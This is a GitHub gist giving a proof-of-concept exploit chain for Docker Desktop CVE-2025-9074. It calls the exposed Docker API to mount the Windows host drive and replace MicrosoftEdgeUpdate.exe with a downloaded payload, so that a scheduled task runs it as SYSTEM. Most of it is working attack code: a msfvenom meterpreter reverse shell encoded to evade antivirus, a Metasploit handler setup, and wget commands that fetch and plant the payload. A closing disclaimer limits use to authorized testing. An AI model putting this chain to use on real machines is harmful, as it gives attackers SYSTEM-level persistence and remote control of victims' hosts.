Skip to content

Instantly share code, notes, and snippets.

@suuhm

suuhm/edge_ts_hijack.md

Last active September 13, 2025 19:06
Show Gist options
  • Save suuhm/1d490fe6063ca22d2ef3e8cdcdbc540f to your computer and use it in GitHub Desktop.
Save suuhm/1d490fe6063ca22d2ef3e8cdcdbc540f to your computer and use it in GitHub Desktop.
Download ZIP
Autorun your wished payload with Hijacking MSEdgeUpdate Schedule Task via Docker Desktop CVE-2025-9074 - PoC
Raw
edge_ts_hijack.md

Autorun your wished payload with Hijacking MSEdgeUpdate Schedule Task via Docker Desktop CVE-2025-9074 - PoC

More info about the CVE: https://blog.qwertysecurity.com/Articles/blog3.html

  1. Autostart:
  2. TaskSheduler:
# check Cronjobs with:
Get-ScheduledTask | Where-Object {$_.State -eq 'Ready'}

Trying with:

  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe AS SYSTEM
  • C:\Users\username\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe AS user USER
  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp Classic Start-Menu
# Payload creation with bad encoding... 
# try to pentest with defender turning off!
# (shikata_ga_nai encoder, /w 5 iterations):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o calc.exe
python -m http.server 8889

MSFCONSOLE

# msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
# set ExitOnSession false
exploit -j

RUN on DOCKER

# Download my "calc" Payload from $HOST ;)
# wget http://host.docker.internal:8000/calc.exe
# mv calc.exe EdgeUpdate\MicrosoftEdgeUpdate.exe
HOST=127.0.0.1
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","wget http://$HOST:8000/calc.exe -O host_root/Program\\ Files\\ \\(x86\\)/Microsoft/EdgeUpdate/MicrosoftEdgeUpdate.exe"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
grafik

Important

⚠️ Important Security Notice ⚠️

This gist contains payloads and exploit scripts intended only for authorized security testing and educational purposes. Unauthorized use or distribution of these materials is strictly prohibited and may result in legal consequences.

  • Use the provided code exclusively in controlled environments or with explicit permission from system owners.
  • The authors do not assume any liability for misuse or damage caused by improper use.
  • Always practice responsible disclosure and follow ethical guidelines in security research.

By using this gist, you acknowledge and agree to comply with these terms.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment